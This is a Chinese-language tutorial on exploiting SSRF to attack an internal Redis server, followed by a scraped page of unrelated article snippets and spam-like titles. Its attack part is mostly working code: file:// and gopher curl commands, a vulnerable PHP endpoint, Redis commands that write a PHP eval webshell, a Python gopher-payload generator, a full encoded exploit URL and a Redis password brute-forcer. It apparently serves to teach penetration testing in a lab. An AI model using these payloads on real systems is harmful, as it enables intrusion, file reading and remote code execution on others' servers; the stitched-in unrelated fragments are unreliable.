SSRF–(Server-side Request Forge, 服务端请求伪造)
定义:由攻击者构造的攻击链接传给服务端执行造成的漏洞,一般用来在外网探测或攻击内网服务

SSRF漏洞思维导图如下,本篇主要介绍利用SSRF漏洞攻击内网Redis

SSRF攻击内网Redis

当存在SSRF漏洞且内网中Redis服务可以未授权访问时,利用Redis 任意文件写入成为十分常见的利用方式,一般内网中会存在 root 权限运行的 Redis 服务,利用 Gopher 协议可以攻击内网中的 Redis。

在之前的文章《浅谈SSRF漏洞之基础篇》,我们了解了file, dict, gopher协议的常规利用。

① 2000多本网络安全系列电子书
② 网络安全标准题库资料
③ 项目源码
④ 网络安全基础入门、Linux、web安全、攻防方面的视频
⑤ 网络安全学习路线图
【点击这里】

# 利用file协议查看文件
curl -v 'http://sec.com/ssrf.php?url=file:///etc/passwd'# 利用dict探测端口
curl -v 'http://sec.com/ssrf.php?url=dict://127.0.0.1:6379'# 利用gopher协议反弹shell
curl -v 'http://sec.com/ssrf.php?url=gopher%3A%2F%2F127.0.0.1%3A6379/_....'

想要利用 Gopher 协议构造报文我们就必须弄清楚Redis是怎么进行数据传输的–即【RESP协议】。

Redis传输协议–[RESP协议]

Redis未授权访问。

使用docker搭建现成的Redis未授权漏洞环境进行试验,过程如下:

  1. 获取Redis定制镜像
# 搜索镜像
docker search ju5ton1y
# 拉取镜像
docker pull ju5ton1y/redis
  1. 运行Redis容器

    ps:想要了解ju5ton1y/redis镜像dockerfile如何编写的同学可以看文末彩蛋~

# 运行Redis
docker run -p 6788:6379 --name redis_test -d ju5ton1y/redis

-p 6788:6379 # 端口映射,格式【主机(宿主)端口:容器端口】

-d ju5ton1y/redis # 后台运行容器,返回容器ID

–name redis_test # 命名容器

image-20210119222235294

  1. 进入容器,安装tcpdump抓包工具
# 新终端进入Redis容器
docker exec -it redis_test /bin/bash# 将redis.conf改为无密码未授权
sed -i 's/requirepass 123123/#requirepass 123123/g' /etc/redis.conf# 重启容器使配置生效
docker restart redis_test

image-20210119222559082

image-20210119224913059

# 重新进入容器安装tcpdump
apt-get install tcpdump 
# 监听eth0网卡的6379端口,将报文保存为nopass.pcap
tcpdump -i eth0 port 6379 -w nopass.pcap

image-20210119225549995

  1. 本地客户端进行连接未授权访问,后使用Wireshark打开nopass.pcap

查看TCP流数据,可以看到Redis的数据传输格式,结合官网学习RESP协议,介绍如下:

Redis服务器与客户端通过RESP(REdis Serialization Protocol)协议通信

RESP协议是在Redis 1.2中引入的,但它成为了与Redis 2.0中的Redis服务器通信的标准方式

RESP实际上是一个支持以下数据类型的序列化协议:

  • 简单字符串

  • 错误

  • 整数

  • 批量字符串

  • 数组

RESP在Redis中用作请求 - 响应协议的方式如下:

  1. 客户端将命令作为Bulk Strings的RESP数组发送到Redis服务器

  2. 服务器根据命令实现回复一种RESP类型

在RESP中,某些数据的类型取决于第一个字节:

  • 对于客户端请求Simple Strings,回复的第一个字节是+

  • 对于客户端请求error,回复的第一个字节是-

  • 对于客户端请求Integer,回复的第一个字节是:

  • 对于客户端请求Bulk Strings,回复的第一个字节是$

  • 对于客户端请求array,回复的第一个字节是*

此外,RESP能够使用稍后指定的Bulk StringsArray的特殊变体来表示Null值。

在RESP中,协议的不同部分始终以"\r\n"(CRLF)结束。

可以看到客户端将命令发送到Redis服务器的流程为

  • 客户端向Redis服务器发送一个仅由Bulk Strings组成的RESP Arrays

  • Redis服务器发送任何有效RESP数据类型作为回复返回给客户端

Bulk Strings用于表示长度最大为512 MB的单个二进制安全字符串,按以下方式编码:

  • $字节数:一个$后跟组成字符串的字节数,由CRLF终止。

  • 字符串数据

  • CRLF

字符串f4ke的编码如下:$4\r\nf4ke\r\n,如下图格式


RESP Arrays使用以下格式发送:

  • *元素数*字符作为第一个字节,后跟数组中的元素数,后跟CRLF

  • 数组中的每个元素都附加RESP类型

现在通过下图理解数据包:

  • 每一个*number代表每一行命令,number代表每行命令中数组中的元素个数

  • 图中的*3,代表config get dbfilename这行命令的3个元素

  • $number代表每个元素的长度

  • $6,代表config长度

Redis认证访问,

修改redis.conf配置,有密码的情况下进行抓包。

# 进入容器中修改配置文件
sed -i 's/# requirepass 123123/requirepass 123123/g' /data/redis/redis.conf
# 重启docker容器
docker restart redis_test
# 监听eth0网卡的6379端口,将报文保存为pass.pcap
tcpdump -i eth0 port 6379 -w pass.pcap

wireshark追踪TCP流:

/tmp下成功被写入shell.php

image-20210120102349713

可以看到在每次请求命令执行之前都使用下面格式进行验证:

*2
$4
AUTH
$6
123123

官方文档中提到:客户端可以通过一个写操作发送多个命令,而不需要在发出下一个命令之前读取上一个命令的服务器应答。

因此,在具有认证(弱口令)的情况下,我们依然可以进行与未授权相同的攻击方式,只需要在攻击脚本中加上验证数据即可。

SSRF攻击复现

Redis未授权访问

测试环境:

受害机:腾讯云主机 php7.2 (安装curl扩展)+ apache2 + redis6.0.6

攻击机:windows10

开局给出一段ssrf漏洞代码,利用它找到flag~

# ssrf.php
<?php
$ch = curl_init(); //创建新的 cURL 资源
curl\_setopt($ch, CURLOPT\_URL, $_GET\['url'\]); //设置URL 和相应的选项
# curl\_setopt($ch, CURLOPT\_FOLLOWLOCATION, 1);
curl\_setopt($ch, CURLOPT\_HEADER, 0);
# curl\_setopt($ch, CURLOPT\_PROTOCOLS, CURLPROTO\_HTTP | CURLPROTO\_HTTPS);
curl_exec($ch);   //抓取 URL 内容并把它传递给浏览器,存储进文件
curl_close($ch);  //关闭 cURL 资源,并且释放系统资源
?>

使用dict协议来进行探测内网的主机存活与端口开放情况,使用burpsuite工具设置爆破1000-9000端口,爆破结果如下,6788端口存在redis服务。

且本地无法访问云主机的6788redis端口,其Redis服务只面向云主机所在的内网。

image-20210120165514692

初步思路:构造Redis命令写入webshell,尝试使用中国蚁剑连接查找flag。

flushall
set 1 '<?php eval($_POST\[\\"f4ke\\"\]);?>'
config set dir /var/www/html
config set dbfilename 5he1l.php
save
quit

根据RESP协议使用七友师傅编写的python脚本redisSsrf.py,将上述命令转换为gopher payload。

import urllib.parseprotocol = "gopher://"
ip = "127.0.0.1"
port = "6788"
shell = "\\n\\n<?php eval($_POST\[\\"f4ke\\"\]);?>\\n\\n"
filename = "5he1l.php"
path = "/var/www/html"
passwd = ""
cmd = \["flushall","set 1 {}".format(shell.replace(" ","${IFS}")),  "config set dir {}".format(path),"config set dbfilename {}".format(filename),"save","quit"\]
if passwd:cmd.insert(0,"AUTH {}".format(passwd))
payload = protocol + ip + ":" + port + "/_"
def redis_format(arr):CRLF = "\\r\\n"redis_arr = arr.split(" ")cmd = ""cmd += "*" + str(len(redis_arr))for x in redis_arr:cmd += CRLF + "$" + str(len((x.replace("${IFS}"," ")))) + CRLF + x.replace("${IFS}"," ")cmd += CRLFreturn cmdif \_\_name\_\_=="\_\_main\_\_":for x in cmd:payload += urllib.parse.quote(redis_format(x))# print(payload)print(urllib.parse.quote(payload))

执行redisSsrf.py脚本,生成payload,

image-20210121102100251

放入url参数浏览器请求如下,成功执行Redis命令写入webshell。

http://xx.xx.xx.xx:8000/ssrf.php?url=gopher%3A//127.0.0.1%3A6788/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252433%250D%250A%250A%250A%253C%253Fphp%2520eval%2528%2524_POST%255B%2522f4ke%2522%255D%2529%253B%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A/var/www/html%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250A5he1l.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%252A1%250D%250A%25244%250D%250Aquit%250D%250A

使用中国蚁剑建立连接,文件即为我们刚刚写入的5he1l.php,密码为f4ke

保存数据右键文件管理,即可找到flag文件。

Redis弱口令认证

测试环境:

受害机:腾讯云主机 php7.2 (安装curl扩展)+ apache2 + redis6.0.6

攻击机:windows10

浏览器访问返回如下:未对请求进行密码认证。

我们进一步利用dict协议,使用下面的格式尝试认证密码。

dict://serverip:port/命令:参数
dict://127.0.0.1:6788/auth:123456

使用auth:123456,返回结果:

使用auth:123123,返回结果:

通过两次响应结果,可以确定Redis的密码为123123,

因此在面对内网redis认证的情况下,可以利用dict或者gopher等协议编写脚本尝试爆破Redis口令,简单实现爆破脚本如下:

import urllib.request
import urllib.parse url = "http://xx.xx.xx.xx:8000/ssrf.php?url="param = 'dict://127.0.0.1:6788/auth:'with open(r'd:\\test\\top100.txt', 'r') as f:for i in range(100):passwd = f.readline()all_url = url + param + passwd# print(all_url)request = urllib.request.Request(all_url)response = urllib.request.urlopen(request).read()# print(response)if "+OK\\r\\n+OK\\r\\n".encode() in response:print("redis passwd: " + passwd)break

将爆破得到的密码,加入到redisSsrf.py脚本中,接下来的攻击与未授权访问的攻击流程一样获得服务器的权限。

SSRF利用工具

Gopherus - https://github.com/tarunkant/Gopherus

Gopherus可以帮助我们直接生成Gopher payload,以利用SSRF(服务器端请求伪造)并获得RCE(远程代码执行),

例如,本篇文章中的七友师傅的脚本即可用此工具代替直接生成payload。

常用的还有以下两个工具

  • SSRFmap - https://github.com/swisskyrepo/SSRFmap

  • shellver - https://github.com/0xR0/shellver

总结

SSRF攻击内网Redis的利用方式除了写入webshell之外,还可以利用

  • 计划任务执行命令反弹shell

  • 写ssh-keygen公钥然后使用私钥登陆

这两种方法在《Redis未授权漏洞总结》一文中都有详细利用,只要将payload结合本文redisSsrf.py的脚本,就可以实现攻击。

通过Redis攻击环境的搭建,熟悉了docker命令及dockerfile的编写,还有ubuntu apache2配置及自带的防火墙ufw使用。

彩蛋

Dockerfile文件如何实现Redis未授权环境的定制:

#Redis 未授权访问# 基于ubuntu:16.04版本
FROM ubuntu:16.04# Maintainer: 设置该镜像的作者
MAINTAINER ju5ton1y# RUN:用于执行后面跟着的命令行命令。有以下俩种格式:## shell 格式:等同于在终端操作的 shell 命令
RUN echo "deb http://mirrors.aliyun.com/ubuntu/ xenial main restricted universe multiverse\\ndeb http://mirrors.aliyun.com/ubuntu/ xenial-security main restricted universe multiverse\\ndeb http://mirrors.aliyun.com/ubuntu/ xenial-updates main restricted universe multiverse\\ndeb http://mirrors.aliyun.com/ubuntu/ xenial-backports main restricted universe multiverse" > /etc/apt/sources.list  # 换源RUN apt-get update  # 更新
RUN apt-get install -y openssh-server make gcc
#RUN wget http://download.redis.io/releases/redis-3.2.11.tar.gz# COPY:从上下文目录中复制文件或者目录到容器里指定路径
COPY redis-3.2.11.tar.gz ./  # 复制redis安装包到容器当前文件夹
RUN tar xzf redis-3.2.11.tar.gz # 解压
RUN cd redis-3.2.11 && make && cd src && cp redis-server /usr/bin &&  cp redis-cli /usr/bin  # 编译并将redis-server及redis-cli复制到/usr/bin目录下# ADD:复制文件指令。它有两个参数<source>和<destination>。destination是容器内的路径。source可以是URL或者是启动配置上下文中的一个文件
ADD redis.conf /etc/redis.conf  # 映射配置文件到容器内
ADD sshd\_config /etc/ssh/sshd\_config# EXPOSE:指定容器在运行时监听的端口
EXPOSE 6379 22RUN /etc/init.d/ssh restart  # 重启ssh服务# CMD 类似于 RUN 指令,在docker run时运行
## exec 格式:等价于 RUN redis-server /etc/redis.conf
CMD \["redis-server", "/etc/redis.conf"\]  # 以被映射到容器中的配置文件启动redis服务

其中启动配置上下文目录如下:

查看全文
如若内容造成侵权/违法违规/事实不符,请联系编程学习网邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!

相关文章

  1. 利用python的turtle库画出两种五角星

    1.中间有线条的五角星&#xff0c;效果如下&#xff1a; #Five_Star.py(五角星)from turtle import * #导入画图库pensize(5) #画笔的大小&#xff08;像素&#xff09; pencolor(red) #画笔的颜色&#xff08;单词&#xff0c;数字&#xff09; colo…...

    2024/5/7 15:25:17
  2. 可重入函数 = 安全函数

    函数是否安全&#xff1f; 在实时系统的设计中&#xff0c;经常会出现多个任务调用同一个函数的情况。如果这个函数不幸被设计成为不可重入的函数的话&#xff0c;那么不同任务调用这个函数时可能修改其他任务调用这个函数的数据&#xff0c;从而导致不可预料的后果。这样的函…...

    2024/5/7 15:29:28
  3. 第二章 物理层——默默无闻的绝世高手 #计算机网络#考研

    物理层是五大层次结构里面最低等级的层次&#xff0c;那为啥我要说它是绝世高手呢&#xff1f; 原因在于&#xff0c;往往最容易被人忽视的一层就是物理层&#xff0c;但是它在实现可靠传输&#xff08;降低干扰&#xff09;&#xff0c;在数据的转换&#xff0c;在链路上面按某…...

    2024/4/14 21:11:48
  4. Nyquist 尼奎斯特采样定理

    目录 一、前言 二、Nyquist 采样定理 三、混叠 一、前言 采样定理在1928年由美国电信工程师H.奈奎斯特首先提出来的&#xff0c;因此称为奈奎斯特采样定理。 1933年由苏联工程师科捷利尼科夫首次用公式严格地表述这一定理&#xff0c;因此在苏联文献中称为科捷利尼科夫采样…...

    2024/5/8 2:04:33
  5. FPN、PAN在计算机视觉(CV)领域的意思

    FPN&#xff1a;Feature Pyramid Network的首字母缩写&#xff0c;即特征金字塔网络的意思&#xff1b; PAN&#xff1a;Pixel Aggregation Network的首字母缩写&#xff0c;即像素聚合网络的意思&#xff1b;...

    2024/5/2 22:31:03
  6. 集合及运算

    1.集合的表示&#xff1a;交、并、补、差&#xff0c;判断一个元素是否属于某一集合 2.并查集&#xff1a;集合并、查某元素属于什么集合 3.并查集问题中集合存储如何实现&#xff1f; 可以用树结构表示集合&#xff0c;树的每个节点代表一个集合元素 4.连接 &#xff1a;具有传…...

    2024/4/17 8:21:16
  7. FOFA信息搜集之—FofaSpider

    目录 1.前言 2.由浅入深 3.主要代码 4.FofaSpider使用 5.FofaSpider配合POCsuite快速挖洞 1.前言 不管是渗透还是平时SRC挖漏洞&...

    2024/4/14 21:12:08
  8. vue资料整理: 对Vue的单向数据流的理解

    数据从父级组件传递给子组件&#xff0c;只能单向绑定。子组件内部不能直接修改从父级传递过来的数据。 所有的 prop 都使得其父子 prop 之间形成了一个单向下行绑定&#xff1a;父级 prop 的更新会向下流动到子组件中&#xff0c;但是反过来则不行&#xff0c;这点类似单工通讯…...

    2024/4/20 17:11:38
  9. Java中static和final总结

    文章目录1 final1.1 final总结1.2 使用final意义2 static2.1 static总结2.2 理解Java的static import静态引入机制2.2.1 精确导入的方式2.2.2 按需导入的方式2.2.3 可以导入的种种东西2.2.4 导入之间的冲突问题2.2.5 本地和外来的竞争2.2.6 Static Import的负面影响2.3 java静态…...

    2024/4/14 21:11:58
  10. MM系列资料整理

    一、MMdetection 系列源码解读 资料&#x1f517; 轻松掌握 MMDetection 整体构建流程(一)https://zhuanlan.zhihu.com/p/337375549...

    2024/4/20 15:00:18
  11. Java面试一百道(第四道)-final的作用

    final的作用 翻译&#xff1a;final 最终 final修饰的类无法被继承&#xff0c;被final修饰的类就像那被阉割的人&#xff0c;不存在子类&#xff0c;有的话建议给子类做个亲子鉴定&#xff1b; final修饰方法不能被重写&#xff0c;但是可以重载; final修饰的变量不可更改…...

    2024/4/19 12:49:37
  12. JXNU 月考题--步数找规律题

    如题&#xff1a; 提示如图&#xff1a; 代码说话&#xff1a; #include<iostream> #include<math.h> using namespace std; int main(){int t;cin>>t;while(t--){int a,b,c,d;cin>>a>>b>>c>>d;int xabs(a-c);int yabs(b-d);if(y&g…...

    2024/4/20 3:52:35
  13. 实验与分析 —— numpy.vectorize

    函数功能 numpy.vectorize函数可以实现任意函数的向量化&#xff0c;从而避免在python中使用循环&#xff0c;提高效率(还真不一定能提高效率…)。另外&#xff0c;用好函数的signature参数&#xff0c;可以让本来就是处理向量的函数按照自己的需求对向量的向量进行批量化处理…...

    2024/4/19 13:47:59
  14. 数据库原理及应用的学习笔记-引言

    数据库 数据库是面向显示企业或应用单位的数据集合 数据、数据模型、数据模式的区别 数据&#xff1a;就是符号&#xff0c;用来描述现实世界的各种符号就是数据&#xff0c;是是信息存在的形式。比如&#xff1a;桌子1米5高&#xff0c;颜色是绿色的。数据模型&#xff1a;…...

    2024/4/17 7:29:13
  15. 电脑微信双开或多开

    首先保证有安装微信程序 方法一&#xff1a;bat文件开启 按照以下步骤执行【&#xff08;附图&#xff09;&#xff08;运行时保证微信程序不在运行&#xff09;】 首先&#xff0c;新建一个TXT文件 右键单击微信&#xff0c;进入微信属性页面 复制微信的安装路径 打开TXT文…...

    2024/4/8 10:28:53
  16. UE4 C++入门之路6-PostEditChangeProperty以及和PostInitProperties的区别

    PostEditChangeProperty前言PostEditChangeProperty前言 之前讲属性初始化的时候说到&#xff0c;如果某个属性需要在设计师在编辑器界面初始化一些值后&#xff0c;依据这些值来计算得出别的属性&#xff0c;或者说有一个函数是在属性初始化后执行的&#xff0c;介绍了PostIn…...

    2024/4/18 5:16:14
  17. KNN算法Matlab实现

    KNN算法Matlab实现 简介&#xff1a; KNN全称K-Nearest Neighbors,源于20世纪70年代。属于有监督学习的传统机器学习算法&#xff0c;既可以解决回归问题也可解决分类问题。本文章只研究K-NN的分类问题&#xff0c;其核心思想是离样本A距离最近的K个样本的类别代表了A的类别。…...

    2024/4/18 9:56:58
  18. 今年的毕业生太难了,非常接地气的Android中高级面经给你们助力

    前言 前几天有个应届毕业生的程序员在微信上找到我&#xff0c;并向我吐槽了一下他目前的心酸现状。我对此除了表示同情以外&#xff0c;只能剩下鼓励了&#xff0c;对于不能帮助他&#xff0c;我深感我自己力量的薄弱&#xff0c;意识到了我必须强大才行&#xff0c;这样才能…...

    2024/4/24 22:00:21
  19. 有了这些接口测试用例+工具,测试效率想不提升都难

    写在前面&#xff1a;在日常开发过程中&#xff0c;有人做前端开发&#xff0c;有人负责后端开发。接口的主要作用就是连接前后台。但是&#xff0c;由于前端和后端开发的速度可能不一样&#xff0c;尤其是后端开发好了&#xff0c;但前端还未开发。这种时候我们需要做接口测试…...

    2024/4/23 10:25:35
  20. C++ 乐趣小游戏:扫雷

    代码展示 #include<bits/stdc.h> using namespace std;bool f[10][10],vis[10][10]; char c; int nx[10][10],bo,a;void re(int x,int y){nx[x-1][y-1];nx[x-1][y1];nx[x-1][y];nx[x][y-1];nx[x][y1];nx[x1][y-1];nx[x1][y];nx[x1][y1]; }void clear(){memset(f,0,size…...

    2024/4/14 21:12:44

最新文章

  1. 【doghead】mac: clion2024.1启动崩溃

    doghead 是在mac 下跑各种数据的因此&#xff0c;在配置了环境后, 进行mac 构建 【doghead】mac构建&#xff0c;首先对mac的clion进行安装 mac 下安装clion2024.1 之前可能装过crack的clion教育优惠的clion跟之前的应该不同clion2024.1 在mac的新系统下崩溃google下竟然没有…...

    2024/5/8 3:27:44
  2. 梯度消失和梯度爆炸的一些处理方法

    在这里是记录一下梯度消失或梯度爆炸的一些处理技巧。全当学习总结了如有错误还请留言&#xff0c;在此感激不尽。 权重和梯度的更新公式如下&#xff1a; w w − η ⋅ ∇ w w w - \eta \cdot \nabla w ww−η⋅∇w 个人通俗的理解梯度消失就是网络模型在反向求导的时候出…...

    2024/5/7 10:36:02
  3. datalist是什么,有什么作用?

    <datalist>标签用于定义一个预定义选项列表&#xff0c;它可以与文本输入框&#xff08;<input type"text">&#xff09;一起使用&#xff0c;提供一组可选的值供用户选择或输入。<datalist>标签中的选项可以通过<option>标签来定义。 <…...

    2024/5/7 12:28:10
  4. BetterZip for Mac2024最新mac解压缩软件

    作为一名软件专家&#xff0c;对于市面上各类软件都有较为深入的了解&#xff0c;下面介绍的是一款适用于Mac系统的解压缩软件——BetterZip&#xff0c;将从其功能特点、使用方法、用户体验及适用人群等方面进行详细介绍。 BetterZip5-安装包绿色版下载如下&#xff1a; htt…...

    2024/5/7 3:56:17
  5. 【外汇早评】美通胀数据走低,美元调整

    原标题:【外汇早评】美通胀数据走低,美元调整昨日美国方面公布了新一期的核心PCE物价指数数据,同比增长1.6%,低于前值和预期值的1.7%,距离美联储的通胀目标2%继续走低,通胀压力较低,且此前美国一季度GDP初值中的消费部分下滑明显,因此市场对美联储后续更可能降息的政策…...

    2024/5/7 5:50:09
  6. 【原油贵金属周评】原油多头拥挤,价格调整

    原标题:【原油贵金属周评】原油多头拥挤,价格调整本周国际劳动节,我们喜迎四天假期,但是整个金融市场确实流动性充沛,大事频发,各个商品波动剧烈。美国方面,在本周四凌晨公布5月份的利率决议和新闻发布会,维持联邦基金利率在2.25%-2.50%不变,符合市场预期。同时美联储…...

    2024/5/7 9:45:25
  7. 【外汇周评】靓丽非农不及疲软通胀影响

    原标题:【外汇周评】靓丽非农不及疲软通胀影响在刚结束的周五,美国方面公布了新一期的非农就业数据,大幅好于前值和预期,新增就业重新回到20万以上。具体数据: 美国4月非农就业人口变动 26.3万人,预期 19万人,前值 19.6万人。 美国4月失业率 3.6%,预期 3.8%,前值 3…...

    2024/5/4 23:54:56
  8. 【原油贵金属早评】库存继续增加,油价收跌

    原标题:【原油贵金属早评】库存继续增加,油价收跌周三清晨公布美国当周API原油库存数据,上周原油库存增加281万桶至4.692亿桶,增幅超过预期的74.4万桶。且有消息人士称,沙特阿美据悉将于6月向亚洲炼油厂额外出售更多原油,印度炼油商预计将每日获得至多20万桶的额外原油供…...

    2024/5/7 14:25:14
  9. 【外汇早评】日本央行会议纪要不改日元强势

    原标题:【外汇早评】日本央行会议纪要不改日元强势近两日日元大幅走强与近期市场风险情绪上升,避险资金回流日元有关,也与前一段时间的美日贸易谈判给日本缓冲期,日本方面对汇率问题也避免继续贬值有关。虽然今日早间日本央行公布的利率会议纪要仍然是支持宽松政策,但这符…...

    2024/5/4 23:54:56
  10. 【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响

    原标题:【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响近日伊朗局势升温,导致市场担忧影响原油供给,油价试图反弹。此时OPEC表态稳定市场。据消息人士透露,沙特6月石油出口料将低于700万桶/日,沙特已经收到石油消费国提出的6月份扩大出口的“适度要求”,沙特将满…...

    2024/5/4 23:55:05
  11. 【外汇早评】美欲与伊朗重谈协议

    原标题:【外汇早评】美欲与伊朗重谈协议美国对伊朗的制裁遭到伊朗的抗议,昨日伊朗方面提出将部分退出伊核协议。而此行为又遭到欧洲方面对伊朗的谴责和警告,伊朗外长昨日回应称,欧洲国家履行它们的义务,伊核协议就能保证存续。据传闻伊朗的导弹已经对准了以色列和美国的航…...

    2024/5/4 23:54:56
  12. 【原油贵金属早评】波动率飙升,市场情绪动荡

    原标题:【原油贵金属早评】波动率飙升,市场情绪动荡因中美贸易谈判不安情绪影响,金融市场各资产品种出现明显的波动。随着美国与中方开启第十一轮谈判之际,美国按照既定计划向中国2000亿商品征收25%的关税,市场情绪有所平复,已经开始接受这一事实。虽然波动率-恐慌指数VI…...

    2024/5/7 11:36:39
  13. 【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试

    原标题:【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试美国和伊朗的局势继续升温,市场风险情绪上升,避险黄金有向上突破阻力的迹象。原油方面稍显平稳,近期美国和OPEC加大供给及市场需求回落的影响,伊朗局势并未推升油价走强。近期中美贸易谈判摩擦再度升级,美国对中…...

    2024/5/4 23:54:56
  14. 【原油贵金属早评】市场情绪继续恶化,黄金上破

    原标题:【原油贵金属早评】市场情绪继续恶化,黄金上破周初中国针对于美国加征关税的进行的反制措施引发市场情绪的大幅波动,人民币汇率出现大幅的贬值动能,金融市场受到非常明显的冲击。尤其是波动率起来之后,对于股市的表现尤其不安。隔夜美国股市出现明显的下行走势,这…...

    2024/5/6 1:40:42
  15. 【外汇早评】美伊僵持,风险情绪继续升温

    原标题:【外汇早评】美伊僵持,风险情绪继续升温昨日沙特两艘油轮再次发生爆炸事件,导致波斯湾局势进一步恶化,市场担忧美伊可能会出现摩擦生火,避险品种获得支撑,黄金和日元大幅走强。美指受中美贸易问题影响而在低位震荡。继5月12日,四艘商船在阿联酋领海附近的阿曼湾、…...

    2024/5/4 23:54:56
  16. 【原油贵金属早评】贸易冲突导致需求低迷,油价弱势

    原标题:【原油贵金属早评】贸易冲突导致需求低迷,油价弱势近日虽然伊朗局势升温,中东地区几起油船被袭击事件影响,但油价并未走高,而是出于调整结构中。由于市场预期局势失控的可能性较低,而中美贸易问题导致的全球经济衰退风险更大,需求会持续低迷,因此油价调整压力较…...

    2024/5/4 23:55:17
  17. 氧生福地 玩美北湖(上)——为时光守候两千年

    原标题:氧生福地 玩美北湖(上)——为时光守候两千年一次说走就走的旅行,只有一张高铁票的距离~ 所以,湖南郴州,我来了~ 从广州南站出发,一个半小时就到达郴州西站了。在动车上,同时改票的南风兄和我居然被分到了一个车厢,所以一路非常愉快地聊了过来。 挺好,最起…...

    2024/5/7 9:26:26
  18. 氧生福地 玩美北湖(中)——永春梯田里的美与鲜

    原标题:氧生福地 玩美北湖(中)——永春梯田里的美与鲜一觉醒来,因为大家太爱“美”照,在柳毅山庄去寻找龙女而错过了早餐时间。近十点,向导坏坏还是带着饥肠辘辘的我们去吃郴州最富有盛名的“鱼头粉”。说这是“十二分推荐”,到郴州必吃的美食之一。 哇塞!那个味美香甜…...

    2024/5/4 23:54:56
  19. 氧生福地 玩美北湖(下)——奔跑吧骚年!

    原标题:氧生福地 玩美北湖(下)——奔跑吧骚年!让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 啊……啊……啊 两…...

    2024/5/4 23:55:06
  20. 扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!

    原标题:扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!扒开伪装医用面膜,翻六倍价格宰客!当行业里的某一品项火爆了,就会有很多商家蹭热度,装逼忽悠,最近火爆朋友圈的医用面膜,被沾上了污点,到底怎么回事呢? “比普通面膜安全、效果好!痘痘、痘印、敏感肌都能用…...

    2024/5/5 8:13:33
  21. 「发现」铁皮石斛仙草之神奇功效用于医用面膜

    原标题:「发现」铁皮石斛仙草之神奇功效用于医用面膜丽彦妆铁皮石斛医用面膜|石斛多糖无菌修护补水贴19大优势: 1、铁皮石斛:自唐宋以来,一直被列为皇室贡品,铁皮石斛生于海拔1600米的悬崖峭壁之上,繁殖力差,产量极低,所以古代仅供皇室、贵族享用 2、铁皮石斛自古民间…...

    2024/5/4 23:55:16
  22. 丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者

    原标题:丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者【公司简介】 广州华彬企业隶属香港华彬集团有限公司,专注美业21年,其旗下品牌: 「圣茵美」私密荷尔蒙抗衰,产后修复 「圣仪轩」私密荷尔蒙抗衰,产后修复 「花茵莳」私密荷尔蒙抗衰,产后修复 「丽彦妆」专注医学护…...

    2024/5/4 23:54:58
  23. 广州械字号面膜生产厂家OEM/ODM4项须知!

    原标题:广州械字号面膜生产厂家OEM/ODM4项须知!广州械字号面膜生产厂家OEM/ODM流程及注意事项解读: 械字号医用面膜,其实在我国并没有严格的定义,通常我们说的医美面膜指的应该是一种「医用敷料」,也就是说,医用面膜其实算作「医疗器械」的一种,又称「医用冷敷贴」。 …...

    2024/5/6 21:42:42
  24. 械字号医用眼膜缓解用眼过度到底有无作用?

    原标题:械字号医用眼膜缓解用眼过度到底有无作用?医用眼膜/械字号眼膜/医用冷敷眼贴 凝胶层为亲水高分子材料,含70%以上的水分。体表皮肤温度传导到本产品的凝胶层,热量被凝胶内水分子吸收,通过水分的蒸发带走大量的热量,可迅速地降低体表皮肤局部温度,减轻局部皮肤的灼…...

    2024/5/4 23:54:56
  25. 配置失败还原请勿关闭计算机,电脑开机屏幕上面显示,配置失败还原更改 请勿关闭计算机 开不了机 这个问题怎么办...

    解析如下&#xff1a;1、长按电脑电源键直至关机&#xff0c;然后再按一次电源健重启电脑&#xff0c;按F8健进入安全模式2、安全模式下进入Windows系统桌面后&#xff0c;按住“winR”打开运行窗口&#xff0c;输入“services.msc”打开服务设置3、在服务界面&#xff0c;选中…...

    2022/11/19 21:17:18
  26. 错误使用 reshape要执行 RESHAPE,请勿更改元素数目。

    %读入6幅图像&#xff08;每一幅图像的大小是564*564&#xff09; f1 imread(WashingtonDC_Band1_564.tif); subplot(3,2,1),imshow(f1); f2 imread(WashingtonDC_Band2_564.tif); subplot(3,2,2),imshow(f2); f3 imread(WashingtonDC_Band3_564.tif); subplot(3,2,3),imsho…...

    2022/11/19 21:17:16
  27. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机...

    win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”问题的解决方法在win7系统关机时如果有升级系统的或者其他需要会直接进入一个 等待界面&#xff0c;在等待界面中我们需要等待操作结束才能关机&#xff0c;虽然这比较麻烦&#xff0c;但是对系统进行配置和升级…...

    2022/11/19 21:17:15
  28. 台式电脑显示配置100%请勿关闭计算机,“准备配置windows 请勿关闭计算机”的解决方法...

    有不少用户在重装Win7系统或更新系统后会遇到“准备配置windows&#xff0c;请勿关闭计算机”的提示&#xff0c;要过很久才能进入系统&#xff0c;有的用户甚至几个小时也无法进入&#xff0c;下面就教大家这个问题的解决方法。第一种方法&#xff1a;我们首先在左下角的“开始…...

    2022/11/19 21:17:14
  29. win7 正在配置 请勿关闭计算机,怎么办Win7开机显示正在配置Windows Update请勿关机...

    置信有很多用户都跟小编一样遇到过这样的问题&#xff0c;电脑时发现开机屏幕显现“正在配置Windows Update&#xff0c;请勿关机”(如下图所示)&#xff0c;而且还需求等大约5分钟才干进入系统。这是怎样回事呢&#xff1f;一切都是正常操作的&#xff0c;为什么开时机呈现“正…...

